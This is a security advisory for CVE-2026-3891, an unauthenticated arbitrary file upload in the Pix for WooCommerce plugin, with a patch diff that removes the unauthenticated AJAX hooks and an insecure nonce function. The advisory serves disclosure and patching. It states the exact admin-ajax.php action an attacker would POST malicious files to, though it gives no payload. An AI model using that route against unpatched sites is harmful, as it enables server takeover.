Atomic Edge analysis of CVE-2026-3891:
The vulnerability exists in the Pix for WooCommerce plugin’s C6 payment gateway module. The root cause is an unauthenticated file upload handler that lacks capability checks and proper file validation. The plugin registers the ‘lkn_pix_for_woocommerce_c6_save_settings’ AJAX action with both ‘wp_ajax_’ and ‘wp_ajax_nopriv_’ hooks in the LknPaymentPixForWoocommerce class (lines 180-181 in the diff). This allows unauthenticated users to access the file upload functionality. The vulnerable function processes multipart form data containing certificate files and saves them to the server’s filesystem without verifying the user’s permissions or validating file types. The patch removes the ‘wp_ajax_nopriv_’ hook registrations for three AJAX actions: ‘lkn_pix_for_woocommerce_c6_save_settings’, ‘lkn_pix_for_woocommerce_generate_nonce’, and ‘pixforwoo_test_c6_pix_charge’. This restricts access to authenticated users only. The patch also removes the insecure ‘generate_nonce’ function from the admin class and changes certificate storage from file paths to encoded database content. Attackers can exploit this by sending a POST request to /wp-admin/admin-ajax.php with action=’lkn_pix_for_woocommerce_c6_save_settings’ and multipart form data containing malicious files. Successful exploitation allows arbitrary file upload to the server, potentially leading to remote code execution if the uploaded file is placed in an executable directory and accessed via HTTP.
Published : March 18, 2026
CVE-2026-3891: Pix for WooCommerce <= 1.5.0 – Unauthenticated Arbitrary File Upload (payment-gateway-pix-for-woocommerce)
CVE ID
CVE-2026-3891
Severity
Critical
(CVSS 9.8)
CWE
434
Vulnerable Version
1.5.0
Patched Version
1.6.0
Disclosed
March 11, 2026
Analysis Overview
Differential between vulnerable and patched code
Code Diff
--- a/payment-gateway-pix-for-woocommerce/Admin/LknPaymentPixForWoocommerceAdmin.php
+++ b/payment-gateway-pix-for-woocommerce/Admin/LknPaymentPixForWoocommerceAdmin.php
@@ -158,16 +158,4 @@
);
}
}
-
- public function generate_nonce()
- {
- if (empty($_REQUEST['action_name'])) {
- wp_send_json_error(['message' => 'Missing action_name parameter.'], 400);
- }
-
- $action = sanitize_text_field(wp_unslash($_REQUEST['action_name']));
- $nonce = wp_create_nonce($action);
-
- wp_send_json_success(['nonce' => $nonce, 'action' => $action]);
- }
}
--- a/payment-gateway-pix-for-woocommerce/Admin/partials/payment-pix-for-woocommerce-admin-display.php
+++ b/payment-gateway-pix-for-woocommerce/Admin/partials/payment-pix-for-woocommerce-admin-display.php
@@ -1,5 +1,7 @@
<?php
+if ( ! defined( 'ABSPATH' ) ) exit;
+
/**
* Provide a admin area view for the plugin
*
--- a/payment-gateway-pix-for-woocommerce/Includes/LknPaymentPixForWoocommerce.php
+++ b/payment-gateway-pix-for-woocommerce/Includes/LknPaymentPixForWoocommerce.php
@@ -2,6 +2,8 @@
namespace LknPaymentPixForWoocommerceIncludes;
+if ( ! defined( 'ABSPATH' ) ) exit;
+
use LknPaymentPixForWoocommerceAdminLknPaymentPixForWoocommerceAdmin;
use LknPaymentPixForWoocommerceIncludesLknPaymentPixForWoocommercePix;
use LknPaymentPixForWoocommercePublicViewLknPaymentPixForWoocommercePublic;
@@ -94,9 +96,11 @@
public $LknPaymentPixForWoocommercePixC6Class;
public $LknPaymentPixForWoocommercePixC6EndpointClass;
public $LknPaymentPixForWoocommercePixCieloClass;
+ public $LknPaymentPixForWoocommercePixCieloEndpointClass;
public $LknPaymentPixForWoocommercePixRedeClass;
public $LknPaymentPixForWoocommerceHelper;
public $LknPaymentPixForWoocommercePixEndpointClass;
+ public $LknPaymentPixForWoocommercePixRedeEndpointClass;
public function define_hook()
{
@@ -107,9 +111,11 @@
$this->LknPaymentPixForWoocommercePixC6Class = new LknPaymentPixForWoocommercePixC6();
$this->LknPaymentPixForWoocommercePixC6EndpointClass = new LknPaymentPixForWoocommercePixC6Endpoint();
$this->LknPaymentPixForWoocommercePixCieloClass = new LknPaymentPixForWoocommercePixCielo();
+ $this->LknPaymentPixForWoocommercePixCieloEndpointClass = new LknPaymentPixForWoocommercePixCieloEndpoint();
$this->LknPaymentPixForWoocommerceHelper = new LknPaymentPixForWoocommerceHelper();
$this->LknPaymentPixForWoocommercePixEndpointClass = new LknPaymentPixForWoocommercePixEndpoint();
$this->LknPaymentPixForWoocommercePixRedeClass = new LknPaymentPixForWoocommercePixRede();
+ $this->LknPaymentPixForWoocommercePixRedeEndpointClass = new LknPaymentPixForWoocommercePixRedeEndpoint();
$this->define_admin_hooks();
$this->define_public_hooks();
}
@@ -178,11 +184,10 @@
$this->loader->add_action('woocommerce_update_options_payment_gateways_' . $this->LknPaymentPixForWoocommercePixC6Class->id, $this->LknPaymentPixForWoocommercePixC6Class, "process_admin_options");
$this->loader->add_action('woocommerce_order_details_after_order_table', $this->LknPaymentPixForWoocommercePixC6Class, "showPix");
$this->loader->add_action('wp_ajax_lkn_pix_for_woocommerce_c6_save_settings', $this->LknPaymentPixForWoocommercePixC6Class, 'lkn_pix_for_woocommerce_c6_save_settings');
- $this->loader->add_action('wp_ajax_nopriv_lkn_pix_for_woocommerce_c6_save_settings', $this->LknPaymentPixForWoocommercePixC6Class, 'lkn_pix_for_woocommerce_c6_save_settings');
- $this->loader->add_action('wp_ajax_lkn_pix_for_woocommerce_generate_nonce', $plugin_admin, 'generate_nonce');
- $this->loader->add_action('wp_ajax_nopriv_lkn_pix_for_woocommerce_generate_nonce', $plugin_admin, 'generate_nonce');
+ // SECURITY: Removed wp_ajax_nopriv_ hooks to prevent unauthenticated access
+ // SECURITY: Removed insecure generate_nonce functionality - each gateway generates its own nonces
$this->loader->add_action('wp_ajax_pixforwoo_test_c6_pix_charge', $this->LknPaymentPixForWoocommercePixC6Class, 'pixforwoo_test_c6_pix_charge');
- $this->loader->add_action('wp_ajax_nopriv_pixforwoo_test_c6_pix_charge', $this->LknPaymentPixForWoocommercePixC6Class, 'pixforwoo_test_c6_pix_charge');
+ // SECURITY: Removed wp_ajax_nopriv_pixforwoo_test_c6_pix_charge - test integration requires authentication
$this->loader->add_action('woocommerce_update_options_payment_gateways_' . $this->LknPaymentPixForWoocommercePixCieloClass->id, $this->LknPaymentPixForWoocommercePixCieloClass, "process_admin_options");
$this->loader->add_action('woocommerce_order_details_after_order_table', $this->LknPaymentPixForWoocommercePixCieloClass, "showPix");
@@ -257,10 +262,19 @@
if (isset($this->LknPaymentPixForWoocommercePixPagHiperEndpointClass)) {
$this->loader->add_filter('rest_api_init', $this->LknPaymentPixForWoocommercePixPagHiperEndpointClass, 'registerVerifyPixEndPoint');
}
+
+ if (isset($this->LknPaymentPixForWoocommercePixRedeEndpointClass)) {
+ $this->loader->add_filter('rest_api_init', $this->LknPaymentPixForWoocommercePixRedeEndpointClass, 'register_verify_pix_endpoint');
+ }
+
if (isset($this->LknPaymentPixForWoocommercePixC6EndpointClass)) {
$this->loader->add_filter('rest_api_init', $this->LknPaymentPixForWoocommercePixC6EndpointClass, 'registerVerifyPixEndPoint');
}
+ if (isset($this->LknPaymentPixForWoocommercePixCieloEndpointClass)) {
+ $this->loader->add_filter('rest_api_init', $this->LknPaymentPixForWoocommercePixCieloEndpointClass, 'register_verify_pix_endpoint');
+ }
+
if (isset($this->LknPaymentPixForWoocommercePixEndpointClass)) {
$this->loader->add_filter('rest_api_init', $this->LknPaymentPixForWoocommercePixEndpointClass, 'registerRoutes');
}
@@ -295,7 +309,7 @@
{
$schedules['lkn_five_minutes'] = array(
'interval' => 300, // 5 minutos em segundos
- 'display' => __('Every 5 Minutes', 'gateway-de-pagamento-pix-para-woocommerce')
+ 'display' => __('Every 5 Minutes', 'lkn-payment-pix-for-woocommerce')
);
return $schedules;
}
@@ -339,7 +353,7 @@
$new_meta_links['setting'] = sprintf(
'<a href="%1$s">%2$s</a>',
admin_url('admin.php?page=wc-settings&tab=checkout'),
- __('Settings', 'gateway-de-pagamento-pix-para-woocommerce')
+ __('Settings', 'lkn-payment-pix-for-woocommerce')
);
return array_merge($plugin_meta, $new_meta_links);
--- a/payment-gateway-pix-for-woocommerce/Includes/LknPaymentPixForWoocommerceI18n.php
+++ b/payment-gateway-pix-for-woocommerce/Includes/LknPaymentPixForWoocommerceI18n.php
@@ -39,7 +39,7 @@
// WordPress loads translations automatically since version 4.6.
// load_plugin_textdomain(
- // 'gateway-de-pagamento-pix-para-woocommerce',
+ // 'lkn-payment-pix-for-woocommerce',
// false,
// dirname(dirname(plugin_basename(__FILE__))) . '/languages/'
// );
--- a/payment-gateway-pix-for-woocommerce/Includes/LknPaymentPixForWoocommerceLoader.php
+++ b/payment-gateway-pix-for-woocommerce/Includes/LknPaymentPixForWoocommerceLoader.php
@@ -1,6 +1,8 @@
<?php
namespace LknPaymentPixForWoocommerceIncludes;
+if ( ! defined( 'ABSPATH' ) ) exit;
+
/**
* Register all actions and filters for the plugin
*
--- a/payment-gateway-pix-for-woocommerce/Includes/LknPaymentPixForWoocommercePix.php
+++ b/payment-gateway-pix-for-woocommerce/Includes/LknPaymentPixForWoocommercePix.php
@@ -18,8 +18,8 @@
$this->id = 'lkn_pix_for_woocommerce';
$this->title = 'Pix QR Code';
$this->has_fields = true;
- $this->method_title = esc_attr__('Pay with the Pix QR Code', 'gateway-de-pagamento-pix-para-woocommerce');
- $this->method_description = esc_attr__('Enables and configures payments with Pix', 'gateway-de-pagamento-pix-para-woocommerce');
+ $this->method_title = esc_attr__('Pay with the Pix QR Code', 'lkn-payment-pix-for-woocommerce');
+ $this->method_description = esc_attr__('Enables and configures payments with Pix', 'lkn-payment-pix-for-woocommerce');
// Define os campos de configuração do método de pagamento
@@ -55,7 +55,7 @@
'pixKey' => $this->get_option('pix_key'),
'pixName' => $this->get_option('pix_name'),
'pixCity' => $this->get_option('pix_city'),
- 'copiedText' => __('Copied!', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'copiedText' => __('Copied!', 'lkn-payment-pix-for-woocommerce'),
));
wp_enqueue_style('lkn-woo-payment-pix-style', PAYMENT_PIX_FOR_WOOCOMMERCE_DIR_URL . 'Public/css/LknPaymentPixForWoocommercePaymentFields.css', array(), '1.0.0', 'all');
@@ -79,83 +79,83 @@
{
$this->form_fields = array(
'enabled' => array(
- 'title' => esc_attr__('Enable/Disable', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Enable/Disable', 'lkn-payment-pix-for-woocommerce'),
'type' => 'checkbox',
- 'label' => __('Enables payment with Pix', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'label' => __('Enables payment with Pix', 'lkn-payment-pix-for-woocommerce'),
'default' => 'no'
),
'title' => array(
- 'title' => esc_attr__('Title', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Title', 'lkn-payment-pix-for-woocommerce'),
'type' => 'text',
- 'description' => __('This field controls the title which the user sees during checkout.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'default' => __('Pay with the Pix QR Code', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'description' => __('This field controls the title which the user sees during checkout.', 'lkn-payment-pix-for-woocommerce'),
+ 'default' => __('Pay with the Pix QR Code', 'lkn-payment-pix-for-woocommerce'),
'desc_tip' => true,
),
'title_general' => array(
- 'title' => esc_attr__('General settings', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('General settings', 'lkn-payment-pix-for-woocommerce'),
'type' => 'title',
),
'pix_key_type' => array(
- 'title' => esc_attr__('Key Type', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Key Type', 'lkn-payment-pix-for-woocommerce'),
'type' => 'select',
- 'description' => esc_attr__('Select the type of PIX key.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'description' => esc_attr__('Select the type of PIX key.', 'lkn-payment-pix-for-woocommerce'),
'desc_tip' => true,
'class' => 'wc-enhanced-select',
'options' => array(
- 'tel' => esc_attr__('Phone', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'cpf' => esc_attr__('CPF', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'cnpj' => esc_attr__('CNPJ', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'email' => esc_attr__('Email', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'randomKey' => esc_attr__('Random key', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'tel' => esc_attr__('Phone', 'lkn-payment-pix-for-woocommerce'),
+ 'cpf' => esc_attr__('CPF', 'lkn-payment-pix-for-woocommerce'),
+ 'cnpj' => esc_attr__('CNPJ', 'lkn-payment-pix-for-woocommerce'),
+ 'email' => esc_attr__('Email', 'lkn-payment-pix-for-woocommerce'),
+ 'randomKey' => esc_attr__('Random key', 'lkn-payment-pix-for-woocommerce'),
),
),
'pix_key' => array(
- 'title' => esc_attr__('Pix Key', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Pix Key', 'lkn-payment-pix-for-woocommerce'),
'type' => 'text',
'custom_attributes' => array(
'required' => 'required'
),
- 'description' => esc_attr__('Enter the PIX key to be used for donations.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'description' => esc_attr__('Enter the PIX key to be used for donations.', 'lkn-payment-pix-for-woocommerce'),
'desc_tip' => true,
'default' => '',
),
'pix_name' => array(
- 'title' => esc_attr__('Beneficiary Name', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Beneficiary Name', 'lkn-payment-pix-for-woocommerce'),
'type' => 'text',
- 'description' => esc_attr__('Enter the name of the key beneficiary.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'description' => esc_attr__('Enter the name of the key beneficiary.', 'lkn-payment-pix-for-woocommerce'),
'desc_tip' => true,
'default' => '',
),
'pix_city' => array(
- 'title' => esc_attr__('Beneficiary City', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Beneficiary City', 'lkn-payment-pix-for-woocommerce'),
'type' => 'text',
- 'description' => esc_attr__('Enter the city of the key beneficiary.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'description' => esc_attr__('Enter the city of the key beneficiary.', 'lkn-payment-pix-for-woocommerce'),
'desc_tip' => true,
'default' => '',
),
'hidde_paid_pix' => array(
- 'title' => esc_attr__('Hide Pix after payment', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'label' => esc_attr__('Hide Pix QRCode for logged in customers with processing or completed order', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Hide Pix after payment', 'lkn-payment-pix-for-woocommerce'),
+ 'label' => esc_attr__('Hide Pix QRCode for logged in customers with processing or completed order', 'lkn-payment-pix-for-woocommerce'),
'type' => 'checkbox',
'desc_tip' => true,
- 'description' => esc_attr__('Enable this option to hide the Pix QR Code in my customer account that is processing or completed.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'description' => esc_attr__('Enable this option to hide the Pix QR Code in my customer account that is processing or completed.', 'lkn-payment-pix-for-woocommerce'),
'default' => 'no',
),
'title_additional_resources' => array(
- 'title' => esc_attr__('Additional Resources', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Additional Resources', 'lkn-payment-pix-for-woocommerce'),
'type' => 'title',
),
'debug' => array(
- 'title' => esc_attr__('Debug', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Debug', 'lkn-payment-pix-for-woocommerce'),
'type' => 'checkbox',
- 'label' => esc_attr__('Enable debug logs.', 'gateway-de-pagamento-pix-para-woocommerce') . ' ' . wp_kses_post('<a href="' . esc_url(admin_url('admin.php?page=wc-status&tab=logs')) . '" target="_blank">'. __('See logs', 'gateway-de-pagamento-pix-para-woocommerce') .'</a>'),
+ 'label' => esc_attr__('Enable debug logs.', 'lkn-payment-pix-for-woocommerce') . ' ' . wp_kses_post('<a href="' . esc_url(admin_url('admin.php?page=wc-status&tab=logs')) . '" target="_blank">'. __('See logs', 'lkn-payment-pix-for-woocommerce') .'</a>'),
'default' => 'no',
),
'pix_qr_code' => array(
- 'title' => esc_attr__('QR Code', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('QR Code', 'lkn-payment-pix-for-woocommerce'),
'type' => 'hidden',
'id' => 'lknPaymentPixForWoocommercePixQRCode',
- 'description' => esc_attr__('The QR code will only be valid if the key has been registered with a financial institution (Bank).', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'description' => esc_attr__('The QR code will only be valid if the key has been registered with a financial institution (Bank).', 'lkn-payment-pix-for-woocommerce'),
'desc_tip' => true,
'default' => '',
)
@@ -173,7 +173,7 @@
'pixKey' => $this->get_option('pix_key'),
'pixName' => $this->get_option('pix_name'),
'pixCity' => $this->get_option('pix_city'),
- 'downloadQRCodeText' => __('Download QR Code', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'downloadQRCodeText' => __('Download QR Code', 'lkn-payment-pix-for-woocommerce'),
));
}
}
@@ -212,7 +212,7 @@
try {
if ($this->get_option('pix_key') == '') {
- throw new Exception(__('PIX key is not configured. Please set the PIX key in the plugin settings.', 'gateway-de-pagamento-pix-para-woocommerce'));
+ throw new Exception(__('PIX key is not configured. Please set the PIX key in the plugin settings.', 'lkn-payment-pix-for-woocommerce'));
}
} catch (Exception $e) {
$this->add_error($e->getMessage());
--- a/payment-gateway-pix-for-woocommerce/Includes/LknPaymentPixForWoocommercePixBlocks.php
+++ b/payment-gateway-pix-for-woocommerce/Includes/LknPaymentPixForWoocommercePixBlocks.php
@@ -52,7 +52,7 @@
return [
'title' => $this->gateway->title,
- 'description' => __('Pay for your purchase with pix using Pix QR Code', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'description' => __('Pay for your purchase with pix using Pix QR Code', 'lkn-payment-pix-for-woocommerce'),
];
}
--- a/payment-gateway-pix-for-woocommerce/Includes/LknPaymentPixForWoocommercePixC6.php
+++ b/payment-gateway-pix-for-woocommerce/Includes/LknPaymentPixForWoocommercePixC6.php
@@ -18,8 +18,8 @@
$this->id = 'lkn_pix_for_woocommerce_c6';
$this->title = 'Pix C6';
$this->has_fields = true;
- $this->method_title = esc_attr__('Pay with Pix C6', 'gateway-de-pagamento-pix-para-woocommerce');
- $this->method_description = esc_attr__('Enable automatic payment confirmation through a C6 account', 'gateway-de-pagamento-pix-para-woocommerce');
+ $this->method_title = esc_attr__('Pay with Pix C6', 'lkn-payment-pix-for-woocommerce');
+ $this->method_description = esc_attr__('Enable automatic payment confirmation through a C6 account', 'lkn-payment-pix-for-woocommerce');
$this->init_form_fields();
$this->init_settings();
@@ -59,7 +59,7 @@
) {
// Muda status para pending
$order->update_status('pending');
- $order->add_order_note(__('Order returned to pending and new Pix generated after expiration.', 'gateway-de-pagamento-pix-para-woocommerce'));
+ $order->add_order_note(__('Order returned to pending and new Pix generated after expiration.', 'lkn-payment-pix-for-woocommerce'));
// Dados necessários para gerar novo Pix
$environment = isset($settings['environment']) ? $settings['environment'] : 'production';
@@ -70,19 +70,21 @@
$pix_key = isset($settings['pix_key']) ? $settings['pix_key'] : '';
$client_id = isset($settings['client_id']) ? $settings['client_id'] : '';
$client_secret = isset($settings['client_secret']) ? $settings['client_secret'] : '';
- $crt_path = !empty($settings['certificate_crt_path']) ? PAYMENT_PIX_FOR_WOOCOMMERCE_DIR . $settings['certificate_crt_path'] : '';
- $key_path = !empty($settings['certificate_key_path']) ? PAYMENT_PIX_FOR_WOOCOMMERCE_DIR . $settings['certificate_key_path'] : '';
+ // SECURITY: Certificados armazenados como dados codificados no banco de dados
+ $crt_content = !empty($settings['certificate_crt_content']) ? $settings['certificate_crt_content'] : '';
+ $key_content = !empty($settings['certificate_key_content']) ? $settings['certificate_key_content'] : '';
+
+ $crt_path = !empty($crt_content) ? $this->create_temp_certificate_file($crt_content, 'crt') : '';
+ $key_path = !empty($key_content) ? $this->create_temp_certificate_file($key_content, 'key') : '';
// Auth token
$auth_result = LknPaymentPixForWoocommercePixC6Endpoint::get_c6_auth_token(
- $crt_path,
- $key_path,
$client_id,
$client_secret,
$base_url
);
if (!empty($auth_result['error'])) {
- $order->add_order_note(__('Error generating new Pix: ', 'gateway-de-pagamento-pix-para-woocommerce') . $auth_result['error']);
+ $order->add_order_note(__('Error generating new Pix: ', 'lkn-payment-pix-for-woocommerce') . $auth_result['error']);
$order->save();
return;
}
@@ -112,7 +114,7 @@
);
if (!empty($pix_result['error'])) {
- $order->add_order_note(__('Error generating new Pix: ', 'gateway-de-pagamento-pix-para-woocommerce') . $pix_result['error']);
+ $order->add_order_note(__('Error generating new Pix: ', 'lkn-payment-pix-for-woocommerce') . $pix_result['error']);
$order->save();
return;
}
@@ -158,189 +160,189 @@
{
$this->form_fields = array(
'title_general' => array(
- 'title' => esc_attr__('General settings', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('General settings', 'lkn-payment-pix-for-woocommerce'),
'type' => 'title',
),
'enabled' => array(
- 'title' => esc_attr__('Enable/Disable', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Enable/Disable', 'lkn-payment-pix-for-woocommerce'),
'type' => 'checkbox',
- 'label' => __('Enables payment with Pix', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'description' => esc_attr__('Enable this option to allow customers to pay using Pix.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'label' => __('Enables payment with Pix', 'lkn-payment-pix-for-woocommerce'),
+ 'description' => esc_attr__('Enable this option to allow customers to pay using Pix.', 'lkn-payment-pix-for-woocommerce'),
'default' => 'no',
- 'block_title' => esc_attr__('Enable Pix Payment', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'block_sub_title' => esc_attr__('Activate or deactivate Pix for your store.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'input_description' => esc_attr__('Enable or disable Pix payment for your store.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'block_title' => esc_attr__('Enable Pix Payment', 'lkn-payment-pix-for-woocommerce'),
+ 'block_sub_title' => esc_attr__('Activate or deactivate Pix for your store.', 'lkn-payment-pix-for-woocommerce'),
+ 'input_description' => esc_attr__('Enable or disable Pix payment for your store.', 'lkn-payment-pix-for-woocommerce'),
),
'title' => array(
- 'title' => esc_attr__('Title', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Title', 'lkn-payment-pix-for-woocommerce'),
'type' => 'text',
- 'description' => __('This field controls the title which the user sees during checkout.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'default' => __('Pay with Pix C6', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'description' => __('This field controls the title which the user sees during checkout.', 'lkn-payment-pix-for-woocommerce'),
+ 'default' => __('Pay with Pix C6', 'lkn-payment-pix-for-woocommerce'),
'desc_tip' => true,
- 'block_title' => esc_attr__('Checkout Title', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'block_sub_title' => esc_attr__('Displayed to customers during checkout.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'input_description' => esc_attr__('Set the title for Pix payment on checkout.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'block_title' => esc_attr__('Checkout Title', 'lkn-payment-pix-for-woocommerce'),
+ 'block_sub_title' => esc_attr__('Displayed to customers during checkout.', 'lkn-payment-pix-for-woocommerce'),
+ 'input_description' => esc_attr__('Set the title for Pix payment on checkout.', 'lkn-payment-pix-for-woocommerce'),
),
'description' => array(
- 'title' => esc_attr__('Description', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Description', 'lkn-payment-pix-for-woocommerce'),
'type' => 'textarea',
- 'description' => esc_attr__('Enter the description that will be shown to the user during checkout.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'default' => esc_attr__('Pay for your purchase with Pix using C6 Bank.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'description' => esc_attr__('Enter the description that will be shown to the user during checkout.', 'lkn-payment-pix-for-woocommerce'),
+ 'default' => esc_attr__('Pay for your purchase with Pix using C6 Bank.', 'lkn-payment-pix-for-woocommerce'),
'desc_tip' => true,
- 'block_title' => esc_attr__('Checkout Description', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'block_sub_title' => esc_attr__('Shown to customers during checkout.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'input_description' => esc_attr__('Description shown to customers during checkout.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'block_title' => esc_attr__('Checkout Description', 'lkn-payment-pix-for-woocommerce'),
+ 'block_sub_title' => esc_attr__('Shown to customers during checkout.', 'lkn-payment-pix-for-woocommerce'),
+ 'input_description' => esc_attr__('Description shown to customers during checkout.', 'lkn-payment-pix-for-woocommerce'),
),
'environment' => array(
- 'title' => esc_attr__('Environment', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Environment', 'lkn-payment-pix-for-woocommerce'),
'type' => 'select',
- 'description' => esc_attr__('Select the environment for Pix integration.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'description' => esc_attr__('Select the environment for Pix integration.', 'lkn-payment-pix-for-woocommerce'),
'desc_tip' => true,
'default' => 'production',
'options' => array(
- 'sandbox' => esc_attr__('Sandbox', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'production' => esc_attr__('Production', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'sandbox' => esc_attr__('Sandbox', 'lkn-payment-pix-for-woocommerce'),
+ 'production' => esc_attr__('Production', 'lkn-payment-pix-for-woocommerce'),
),
- 'block_title' => esc_attr__('Environment', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'block_sub_title' => esc_attr__('Choose between test or production environment.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'input_description' => esc_attr__('Select the environment for Pix API requests.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'block_title' => esc_attr__('Environment', 'lkn-payment-pix-for-woocommerce'),
+ 'block_sub_title' => esc_attr__('Choose between test or production environment.', 'lkn-payment-pix-for-woocommerce'),
+ 'input_description' => esc_attr__('Select the environment for Pix API requests.', 'lkn-payment-pix-for-woocommerce'),
),
'pix_key' => array(
- 'title' => esc_attr__('Credentials', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Credentials', 'lkn-payment-pix-for-woocommerce'),
'type' => 'text',
'custom_attributes' => array(
'required' => 'required'
),
- 'description' => esc_attr__('Enter your credentials.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'description' => esc_attr__('Enter your credentials.', 'lkn-payment-pix-for-woocommerce'),
'desc_tip' => true,
'default' => '',
- 'block_title' => esc_attr__('Pix Key', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'block_sub_title' => esc_attr__('Your registered Pix key at C6 Bank.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'input_description' => esc_attr__('Your Pix key registered at C6 Bank.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'block_title' => esc_attr__('Pix Key', 'lkn-payment-pix-for-woocommerce'),
+ 'block_sub_title' => esc_attr__('Your registered Pix key at C6 Bank.', 'lkn-payment-pix-for-woocommerce'),
+ 'input_description' => esc_attr__('Your Pix key registered at C6 Bank.', 'lkn-payment-pix-for-woocommerce'),
),
'client_id' => array(
- 'title' => esc_attr__('C6 Client ID', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('C6 Client ID', 'lkn-payment-pix-for-woocommerce'),
'type' => 'password',
'custom_attributes' => array(
'required' => 'required'
),
- 'description' => esc_attr__('Enter your C6 Client ID.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'description' => esc_attr__('Enter your C6 Client ID.', 'lkn-payment-pix-for-woocommerce'),
'desc_tip' => true,
'default' => '',
- 'block_title' => esc_attr__('Client ID', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'block_sub_title' => esc_attr__('Provided by C6 Bank for API access.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'input_description' => esc_attr__('Your C6 Bank Client ID.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'block_title' => esc_attr__('Client ID', 'lkn-payment-pix-for-woocommerce'),
+ 'block_sub_title' => esc_attr__('Provided by C6 Bank for API access.', 'lkn-payment-pix-for-woocommerce'),
+ 'input_description' => esc_attr__('Your C6 Bank Client ID.', 'lkn-payment-pix-for-woocommerce'),
'join' => 'pix_key'
),
'client_secret' => array(
- 'title' => esc_attr__('C6 Client Secret', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('C6 Client Secret', 'lkn-payment-pix-for-woocommerce'),
'type' => 'password',
'custom_attributes' => array(
'required' => 'required'
),
- 'description' => esc_attr__('Enter your C6 Client Secret.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'description' => esc_attr__('Enter your C6 Client Secret.', 'lkn-payment-pix-for-woocommerce'),
'desc_tip' => true,
'default' => '',
- 'block_title' => esc_attr__('Client Secret', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'block_sub_title' => esc_attr__('Provided by C6 Bank for API access.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'input_description' => esc_attr__('Your C6 Bank Client Secret.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'block_title' => esc_attr__('Client Secret', 'lkn-payment-pix-for-woocommerce'),
+ 'block_sub_title' => esc_attr__('Provided by C6 Bank for API access.', 'lkn-payment-pix-for-woocommerce'),
+ 'input_description' => esc_attr__('Your C6 Bank Client Secret.', 'lkn-payment-pix-for-woocommerce'),
'join' => 'pix_key'
),
'certificate_crt_path' => array(
- 'title' => esc_attr__('Certificates', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Certificates', 'lkn-payment-pix-for-woocommerce'),
'type' => 'file',
- 'description' => esc_attr__('Upload your .crt and .key certificates files.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'description' => esc_attr__('Upload your .crt and .key certificates files.', 'lkn-payment-pix-for-woocommerce'),
'desc_tip' => true,
'default' => '',
